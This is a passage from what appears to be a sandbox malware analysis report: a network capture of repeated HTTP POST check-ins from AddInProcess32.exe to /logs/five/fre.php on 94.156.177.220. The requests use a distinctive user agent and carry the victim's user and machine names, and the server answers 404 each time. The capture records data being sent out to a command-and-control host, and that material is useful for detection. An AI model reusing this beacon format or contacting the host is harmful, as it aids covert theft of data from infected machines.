                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:55.935933113 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:56.915488958 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.224922094.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:57.097372055 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:57.102699041 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:58.072510958 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:57 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.224922194.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:58.236053944 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:58.242856979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:59.198889971 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:59 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.224922294.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:59.349052906 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:59.354585886 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:00.299822092 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.224922394.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:00.508701086 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:00.514142036 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:01.466989040 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    51192.168.2.224922494.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:02.965466022 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:02.970813990 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:03.911752939 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    52192.168.2.224922594.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:04.066261053 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:04.071738005 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:05.015141010 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:04 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    53192.168.2.224922694.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:05.165612936 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:05.171077013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:06.127392054 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    54192.168.2.224922794.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:06.282418966 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:06.288132906 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:07.235351086 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    55192.168.2.224922894.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:07.387917042 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:07.393228054 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:08.350806952 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    56192.168.2.224922994.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:08.512932062 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:08.518292904 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:09.473211050 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    57192.168.2.224923094.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:09.621856928 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:09.627438068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:10.574460983 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    58192.168.2.224923194.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:10.732212067 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:10.737747908 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:11.695601940 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    59192.168.2.224923294.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:11.850244045 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:11.855700016 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:12.798983097 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    60192.168.2.224923394.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:12.947789907 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:12.955607891 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:14.031493902 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    61192.168.2.224923494.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:14.225496054 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:14.230832100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:15.182291985 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    62192.168.2.224923594.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:15.326914072 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:15.332422018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:16.271697044 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    63192.168.2.224923694.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:16.422887087 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:16.428303003 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:17.383274078 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    64192.168.2.224923794.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:17.532151937 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
